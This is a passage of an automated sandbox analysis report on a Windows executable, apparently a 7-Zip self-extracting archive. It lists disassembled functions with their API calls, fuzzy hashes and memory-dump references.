Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: 6a49ffe8ef07d3521491a90d9a8a388089b773908a45dfb32dd5cb480f9273a5
Instruction ID: 5404b23c39375f3672358c8d8a6143ebe8ef3d7cff4e6c8b62a506d5a933efac
Opcode Fuzzy Hash: 6a49ffe8ef07d3521491a90d9a8a388089b773908a45dfb32dd5cb480f9273a5
Instruction Fuzzy Hash: 05E086360003297BCF115F64AD01BCE3F55AF09360F104116FA24961F0C7B2C4B5AB95

Function 004124AC Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00412AE7,00000001,0041EA30,0041EA30,0041A558,?,00405A74,?,?), ref: 004124CF

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 9268ae55d625ba9bd3f65ec717c6ac52065aac6919130e551e4270b037b827da
Instruction ID: b461439d7febe1c34a09764e505ffeaa1d621892ee7a9e15149591a9498c33bb
Opcode Fuzzy Hash: 9268ae55d625ba9bd3f65ec717c6ac52065aac6919130e551e4270b037b827da
Instruction Fuzzy Hash: 21E0C275640208FFDB00DF95D801BDE7BB9AB09354F10C069F9189A260D3799A60DF55

Function 00418390 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00418395

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c44e62af5a1c4d63caea494e9f2a828a81f46f1dcdedab2345fdd327c4800f2a
Instruction ID: f5503d52053c13d59ef663bb5271dc3ef65e74f3c8d6ef33482ecfccbeeb62e3
Opcode Fuzzy Hash: c44e62af5a1c4d63caea494e9f2a828a81f46f1dcdedab2345fdd327c4800f2a
Instruction Fuzzy Hash: F0E08C72A00108FBDB219F85DC01BEEBB38FB40354F00842FF51151110CB795A509A68

Function 00407568 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_beginthreadex.MSVCRT ref: 0040757B

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: _beginthreadex
String ID:
API String ID: 3014514943-0
Opcode ID: 5cedbd00d0b58acbd8f2f67b12d806d60a324f9fe697fccd0a4b4518c7bb1b65
Instruction ID: 07ee00ee9fd24b5c7ccaf45b7f299fd8fb924091db141d3d19c4ab49eb9d3da1
Opcode Fuzzy Hash: 5cedbd00d0b58acbd8f2f67b12d806d60a324f9fe697fccd0a4b4518c7bb1b65
Instruction Fuzzy Hash: 69D017F6800208BFCB01DFA0CC05CEA3BADEB08248B008465BD05C2210E632DA108B61

Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 00412407

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 8938edae947a69c9db44886959f9dc69aa4ca479dc7ae96bb4d07ee1a96cf5e8
Instruction ID: 9ccc3df45c5337931c1f9920f453614b41e8bb9900b5d069a402b44b4c854426
Opcode Fuzzy Hash: 8938edae947a69c9db44886959f9dc69aa4ca479dc7ae96bb4d07ee1a96cf5e8
Instruction Fuzzy Hash: 99E0EC75201208FFDB01CF90CC01FDE7BBDFB49754F208058E90496160C7759A24EB55

Function 00412260 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?), ref: 00412276

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: c430f725063ded926cf1adce3771649bab367042c849bbcb27380caf4cd98197
Instruction ID: a48faa5ad871c9538198cc58908edd1886e2b5d46e41b8f7632e96d43fd9665f
Opcode Fuzzy Hash: c430f725063ded926cf1adce3771649bab367042c849bbcb27380caf4cd98197
Instruction Fuzzy Hash: D7D02231104B22478160BB6AC8004CF73C69F113343008E1EF465836E0C638FDD182DE

Function 00401198 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 0040119C

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 053bab089f67fb7da11783392dabcaa5bb2c6350295daccf07d3f923137bd5e8
Instruction ID: 80e429c9655060905b03d38468354203b5df30ae66867c399f2ea5f3bf3c7cce
Opcode Fuzzy Hash: 053bab089f67fb7da11783392dabcaa5bb2c6350295daccf07d3f923137bd5e8
Instruction Fuzzy Hash: 87C08C36190203CBC7004F30CC026457BE1BBA0714B6486A8A065C63B0DA3EC448CA01

Function 00401397 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?), ref: 004013A4

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 49818983c7c4313c622f2e86d7746392ff58400d4958ac86d60063aa5157a66c
Instruction ID: 2bfd4fe5492bcf1d3212a322bb009ce45eed1b46813e47afac693d05b876fedf
Opcode Fuzzy Hash: 49818983c7c4313c622f2e86d7746392ff58400d4958ac86d60063aa5157a66c
Instruction Fuzzy Hash: 0BC09B753181049BC718FF21C450817B365AB64714714C85FF84C55547CA3BDC82E618

Function 0041247F Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNELBASE(?,?,?,?,004124A9,00000000,00000000,?,004012DC,?), ref: 0041248D

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: FileTime
String ID:
API String ID: 1425588814-0
Opcode ID: a76d94471d75101d3d19dad7ac3713a68ec5cb13f5505408d5a5f3094a28fb24
Instruction ID: f7402770b179a49de0ab9fe0b192ea54849ac29a58fff8f6d7b1295910a8291e
Opcode Fuzzy Hash: a76d94471d75101d3d19dad7ac3713a68ec5cb13f5505408d5a5f3094a28fb24
Instruction Fuzzy Hash: 31C04C36159105FF8F020F70CC04C1ABFA2AB99311F10CA18B155C4074C7328034EB12

Function 004015D8 Relevance: 1.4, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(000001E8,00000000,00000000,?,?,?,?,?,?,00401AD3,?), ref: 004015F7

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 3a0bd8ffb75a7d0c1b376548dc289f793da2ad7584b55b5230689940060f599c
Instruction ID: 576c3123db9d42ad6f26370305c4fe05627a80a4f610c37a806172f0a9a2cc4a
Opcode Fuzzy Hash: 3a0bd8ffb75a7d0c1b376548dc289f793da2ad7584b55b5230689940060f599c
Instruction Fuzzy Hash: C5318271910115ABDB10EFE5CC84CEFB7B8EF48344B15087BE441B72A1D7799E818B69

Function 004128AC Relevance: 1.3, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000060), ref: 00412927

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 6debaf52b1a4c8e37dc45691c4e1b6b73fa31808f858abb765b60bcf64e2121f
Instruction ID: 8d352c1c46fd1df2ac59e7115e7018534418c9226e76046c12a2ea9475f01b4a
Opcode Fuzzy Hash: 6debaf52b1a4c8e37dc45691c4e1b6b73fa31808f858abb765b60bcf64e2121f
Instruction Fuzzy Hash: 3F21C3717142869BCF34FF658A904EB7395AF40314B14462FE482D3201C7B8ADE5CB5E

Function 004035CF Relevance: 1.3, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000018,?,00405789,?,00405D01,?,?,?,?,00405D01,7zSfxVarModulePlatform,x86), ref: 004035D4

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: ac816b6ef2abf4182fe3fab88150d6e7fb7849f17cb6b15ec7980f19aa18face
Instruction ID: 1b5e1ee4d6878524e1e94f3eb7038bf21a854c21e9593a8af651c0b03c199f54
Opcode Fuzzy Hash: ac816b6ef2abf4182fe3fab88150d6e7fb7849f17cb6b15ec7980f19aa18face
Instruction Fuzzy Hash: FED0A9312082203AEA5862320C119AF08884F40329B008C3FB802E62D1DE3ECE81429E

Function 0041229A Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,00412376,00000000,?,004123BE,?,80000000,?,?,?,004123E0,?,?,00000003,00000080), ref: 004122A5

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: bf632d426777a13286a7d214fabf0ee7930240e4f00ef32643c6c823c72a12ea
Instruction ID: 2edd4d7db1caf844859ff0a1764f07c4c63b16d89aef5b3dab10146b982c9a76
Opcode Fuzzy Hash: bf632d426777a13286a7d214fabf0ee7930240e4f00ef32643c6c823c72a12ea
Instruction Fuzzy Hash: 4DD01231604161468E745E3C7A445D637D85A06370321079BF4B5C32E1D3B58CD35A98

Function 00402A2F Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,004133A4,?,?,?,0040C03F,?), ref: 00402A4B

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d52152f8240d310394afd4d808f8c2102ad5bdb202a27d84af0ad2d18dcc3f18
Instruction ID: 5872fe86412dcdd468f52b7ecb5979782df8fbe157f8593837c634c381a8cb4c
Opcode Fuzzy Hash: d52152f8240d310394afd4d808f8c2102ad5bdb202a27d84af0ad2d18dcc3f18
Instruction Fuzzy Hash: 5FC08C703483007AEE211B748F0BB4B3653AF84B16F90C029F348B40E0CBF58410AA0A

Function 00412240 Relevance: 1.3, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00004B38), ref: 00412245

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 60ec2abcf5a6396ef8d7bbb53f790590f8d628139c26fe78cb856bdba3517ae4
Instruction ID: 3495fa19a298e49cc2800c4131356790e1569378de7ddbf050defd7ea7821dd7
Opcode Fuzzy Hash: 60ec2abcf5a6396ef8d7bbb53f790590f8d628139c26fe78cb856bdba3517ae4
Instruction Fuzzy Hash: 40B012E474010671AE4420721F132EF20C007D1385F0408B7AA07E42C2FEDCCAE5912F

Function 00401FF0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,00413333,00000000,?,0041339B,?,?,0040C03F,?), ref: 00402002

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: ef87b2e52dde92dd11102c14b5a17c3afe989afc729bbcebbe3bdea788540431
Instruction ID: 703a6ff84afb8074b9885b8fa9c0ccab1db7962bc4b9572073b4c9a6fb1bc3a6
Opcode Fuzzy Hash: ef87b2e52dde92dd11102c14b5a17c3afe989afc729bbcebbe3bdea788540431
Instruction Fuzzy Hash: 8DB09230285700BAEF224B00DE0DB4A76A0BB80B06F24C428B288240E087B86818DA0E

Non-executed Functions

Function 0040247D Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150stringCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,?), ref: 004024CC
wsprintfW.USER32 ref: 004024DD
GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004024F2
GetLastError.KERNEL32 ref: 004024F7
??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402512
GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402525
GetLastError.KERNEL32 ref: 0040252C
lstrcmpiW.KERNEL32(006B91C8,?), ref: 00402541
??3@YAXPAX@Z.MSVCRT(006B91C8), ref: 00402551
??3@YAXPAX@Z.MSVCRT(?), ref: 0040256F
SetLastError.KERNEL32(00000003), ref: 00402578
lstrlenA.KERNEL32(0041B328), ref: 004025AC
??2@YAPAXI@Z.MSVCRT(00000000), ref: 004025C7
GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 004025F9
_wtol.MSVCRT ref: 0040260A
MultiByteToWideChar.KERNEL32(00000000,0041B328,00000001,006B91C8,00000002), ref: 0040262A

Strings

7zSfxString%d, xrefs: 004024D7

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
String ID: 7zSfxString%d
API String ID: 2117570002-3906403175
Opcode ID: eba394e492bfb50e151d824ecc1c1c613fe538debf7ee36fbf13e84896701797
Instruction ID: 1954578a42ed511618fabe736ee1125ec7d3cad31fc3f85986fc13fa068848c6
Opcode Fuzzy Hash: eba394e492bfb50e151d824ecc1c1c613fe538debf7ee36fbf13e84896701797
Instruction Fuzzy Hash: 9951A379900214FFDB10DF75DD49ADABBA9FB08340F10443AE946E62D0E7B8A951CB1D

Function 004092C1 Relevance: 27.1, APIs: 18, Instructions: 144windowcomtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961

GetDlgItem.USER32(?,000004B8), ref: 004092EE
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004092FD
GetDlgItem.USER32(?,000004B5), ref: 00409344
GetWindowLongW.USER32(00000000,000000F0), ref: 00409349
GetDlgItem.USER32(?,000004B5), ref: 00409359
SetWindowLongW.USER32(00000000), ref: 0040935C
GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00409382
EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00409394
GetDlgItem.USER32(?,000004B4), ref: 0040939E
SetFocus.USER32(00000000), ref: 004093A1
SetTimer.USER32(?,00000001,00000000,00000000), ref: 004093D0
CoCreateInstance.OLE32(0041C464,00000000,00000001,0041BD6C,?), ref: 004093F4
GetDlgItem.USER32(?,00000002), ref: 00409411
IsWindow.USER32(00000000), ref: 00409414
GetDlgItem.USER32(?,00000002), ref: 00409424
EnableWindow.USER32(00000000), ref: 00409427
GetDlgItem.USER32(?,000004B5), ref: 0040943B
ShowWindow.USER32(00000000), ref: 0040943E

Part of subcall function 0040819E: GetDlgItem.USER32(?,000004B6), ref: 004081AC

Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409240), ref: 00408E9F
Part of subcall function 00408E76: LoadIconW.USER32(00000000), ref: 00408EA2
Part of subcall function 00408E76: GetSystemMetrics.USER32(00000032), ref: 00408EB6
Part of subcall function 00408E76: GetSystemMetrics.USER32(00000031), ref: 00408EBB
Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409240), ref: 00408EC4
Part of subcall function 00408E76: LoadImageW.USER32(00000000), ref: 00408EC7
Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EE7
Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408EF0
Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F0C
Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F16
Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F22
Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F31
Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F3F
Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F4D
Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F59
Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F68

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: Item$Window$Long$MessageSendSystem$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTimer
String ID:
API String ID: 1057135554-0
Opcode ID: ba3a8e7896f853d1d8996d9c4767784286a57f8b05f592c4c5be814e68872b41
Instruction ID: 5db8082ad3932120c1d3ad580c4d4a8d12b10d7a787853330903dc21ac74032f
Opcode Fuzzy Hash: ba3a8e7896f853d1d8996d9c4767784286a57f8b05f592c4c5be814e68872b41
Instruction Fuzzy Hash: E54184B0605708AFDA246F22DD49F6B7B9DFF44B04F00843EF955A62E1CB79A850CA1D

Function 004020BF Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 004020CA
FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 004020E7
FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 004020FB
SizeofResource.KERNEL32(00000000,00000000), ref: 0040210C
LoadResource.KERNEL32(00000000,00000000), ref: 00402116
LockResource.KERNEL32(00000000), ref: 00402121
LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 0040214D
GetProcAddress.KERNEL32(00000000), ref: 00402156
wsprintfW.USER32 ref: 00402175
LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 0040218A
GetProcAddress.KERNEL32(00000000), ref: 0040218D

Strings

%04X%c%04X%c, xrefs: 0040216F
kernel32, xrefs: 0040213D, 00402142, 00402189
SetProcessPreferredUILanguages, xrefs: 00402138
SetThreadPreferredUILanguages, xrefs: 00402184

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
API String ID: 2639302590-365843014
Opcode ID: 4509f4e0e8980c838efd414ca7c3a82435c9d4736e02e482c88f6a1a6bb26b48
Instruction ID: 092f3855134823e072dda954e94301c8fdf66ebe7b0f0e4b82829ee13f00460f
Opcode Fuzzy Hash: 4509f4e0e8980c838efd414ca7c3a82435c9d4736e02e482c88f6a1a6bb26b48
Instruction Fuzzy Hash: 7C21B0B5941308BBDB119BA59C08F9B3ABCEB44711F108422FA04E72D0D6B8CD108BA9

Function 00409606 Relevance: 16.6, APIs: 11, Instructions: 96stringwindowCOMMON

